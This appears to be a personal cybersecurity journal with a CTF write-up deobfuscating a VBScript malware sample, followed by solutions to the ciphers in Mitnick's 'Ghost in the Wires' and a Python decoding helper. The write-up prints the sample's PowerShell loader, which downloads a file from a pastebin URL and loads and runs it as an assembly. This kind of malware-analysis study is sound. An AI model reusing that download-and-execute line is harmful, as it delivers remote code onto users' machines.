zeropegasus
Cybersecurity Journal
zeropegasus · 1 year ago
Huntress CTF (VeeBeeEes)
The malware file you are given to inspect is called veebeeeee, a Visual Basic Script file.
CyberChef has a tool called Microsoft Script Decoder.
When you upload the veebeeeee file to CyberChef and use the decoder, you get the output in the screenshots.
Removing every ', al37ysoeopm'al37ysoeopm and " " makes the script much easier to read.
We can see several variables, each built by concatenating string fragments:
Power = Power0 + Power1 + Power2 + Power3 + Power4 + Power5
Path   = Path0 + Path1 + Path2 + Path3 + Path4 + Path5
Reqest = Reqest0 + Reqest1 + Reqest2 +  Reqest3 + Reqest4 + Reqest5
InvokeReqest = InvokeReqest0 + InvokeReqest1 + InvokeReqest2 + InvokeReqest3 + InvokeReqest4 + InvokeReqest5
ExecAssem   = ExecAssem0 + ExecAssem1 + ExecAssem2 + ExecAssem3 + ExecAssem4 + ExecAssem5
And finally:
CollectThenReplace Power , Path , Reqest , InvokeReqest , ExecAssem
Once you concatenate all the values you get:
PowerShell$f='C:\Users\Public\Documents\July.htm'; if (!(Test-Path $f)){Invoke-WebRequest 'https://pastebin.com/raw/SiYGwwcz' -outfile $f  }; [System.Reflection.Assembly]::loadfile($f); [WorkAreaWork]:Exe()
The flag is contained in https://pastebin.com/raw/SiYGwwcz
zeropegasus · 1 year ago
Kevin Mitnick's "Ghost in the Wires" Solved Ciphers
Chapter 1: Rough Start
Cipher: Max vhlm hy max unl wkboxk B nlxw mh ingva fr hpg mktglyxkl (ROT13 with shift 7)
Solution: The cost of the bus driver I used to punch my own transfers
Answer: $15
Chapter 2: Just Visiting
Cipher: Estd mzzv esle elfrse xp szh ez ncplep yph topyetetpd hspy T hld l acp-eppy
Solution: This book taught me how to create new identities when I was a pre-teen (ROT13 shift 15)
Answer: The Paper Trip by Barry Reid
Chapter 3: Original Sin
Cipher: pbzfsobp dkfobtpkx lq pbkfi ppbkfpry aoxtolc iixz lq abpr bobt pbzfsba cl bmvq obail bpbeQ
Solution: These older type of devices were used to call forward business lines to answering services (ROT13 shift 29 && reversed)
Answer: Diverter
Chapter 4: Escape Artist
Cipher: gsvmznvlugsvnzrmuiznvhrszxpvwzgfhxrmgsvzikzmvgwzbh
Solution: thenamesofthemainframesihackedatuscinthearpanetdays (Atbash Cipher)
Answer: COSMOS
Chapter 5: All Your Phone Lines Belong To Me
Cipher: jbi ujt veo eco ntk iwa lhc eeo anu uir trs hae oni rfn irt toh imi ets shs !eu
Solution: I took a course on this subject when I ran from the juvenile authorities! (Caesar Box cipher, moved words around)
Answer: Criminal Justice
Chapter 6: Will Hack for Love
Cipher: bmFtZXRoZWNvbXBhbnl3aGVyZWJvbm5pZXdhc2VtcGxveWVkd2hlbndlc3RhcnRlZGRhdGluZw==
Solution: namethecompanywherebonniewasemployedwhenwestarteddating (Base 64)
Answer: GTE
Chapter 7: Hitched in Haste
Cipher: multbqncannqenabrhfgacnqogehchetbkkebmsqgkncchebr
Solution: numberofdoorcodesihadforpacificbellcentraloffices (substitution alphabet GTEABCDFHIJKLMNOPQRSUVWXYZ. GTE was the answer to the previous question; because GTE goes at the beginning, those letters are removed from their normal positions in the alphabet so there is no overlap)
Answer: 11
Chapter 8: Lex Luthor
Cipher: 'siass nuhmil sowsra amnapi waagoc ifiniti dscisf iiiesf ahgbao staetn itmlro
Solution: "I said I wasn't this famous magician while being a smart ass to prison officials" (Write each word down a list and follow the list from bottom left and up to the right)
Answer: David Copperfield
Chapter 9: The Kevin Mitnick Discount Plan
Cipher: tvifafwawehes hsesoonvtlimaeloemtcagmen irnoerrldony
Solution:
Answer:
Chapter 10: Mystery Hacker
Cipher: gnkusr ooursnsisti ttnotoihiec rolwaintmlk ovtgp
Solution:
Answer:
Chapter 11: Foul Play
Cipher: ow gw ty kc qb eb nm ht ud pc iy ty ik tu zo dp gl qt hd
Solution:
Answer:
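The shift, reversal and keyword-alphabet solutions for Chapters 1, 3 and 7 above can all be reproduced with one letter-substitution helper. This is an added example, not code from the original post; the function names (substitute, rot, keyword_alphabet, keyword_decode, solve) are assumptions chosen here, and the ciphertexts are copied from the entries above.

```python
import string

ALPHA = string.ascii_lowercase

def substitute(text, src, dst):
    """Replace each letter found in src with the letter at the same index in dst."""
    table = str.maketrans(src + src.upper(), dst + dst.upper())
    return text.translate(table)  # spaces and punctuation pass through unchanged

def rot(text, n):
    """Move every letter n places forward; a shift of 29 behaves like a shift of 3."""
    n %= 26
    return substitute(text, ALPHA, ALPHA[n:] + ALPHA[:n])

def keyword_alphabet(keyword):
    """Keyword letters first, then the rest of the alphabet with no repeats.
    Assumes the keyword contains letters only."""
    return "".join(dict.fromkeys(keyword.lower() + ALPHA))

def keyword_decode(text, keyword):
    """Map the keyed alphabet back onto a..z."""
    return substitute(text, keyword_alphabet(keyword), ALPHA)

# Ciphertexts copied from the chapter entries above.
CH1 = "Max vhlm hy max unl wkboxk B nlxw mh ingva fr hpg mktglyxkl"
CH3 = ("pbzfsobp dkfobtpkx lq pbkfi ppbkfpry aoxtolc iixz lq abpr bobt "
       "pbzfsba cl bmvq obail bpbeQ")
CH7 = "multbqncannqenabrhfgacnqogehchetbkkebmsqgkncchebr"

def solve():
    """Return the decoded text for each chapter handled here."""
    return {
        1: rot(CH1, 7),                 # shift 7
        3: rot(CH3[::-1], 29),          # reverse the string, then shift 29
        7: keyword_decode(CH7, "GTE"),  # keyword is the Chapter 6 answer
    }

if __name__ == "__main__":
    for chapter, plaintext in solve().items():
        print(chapter, plaintext)
```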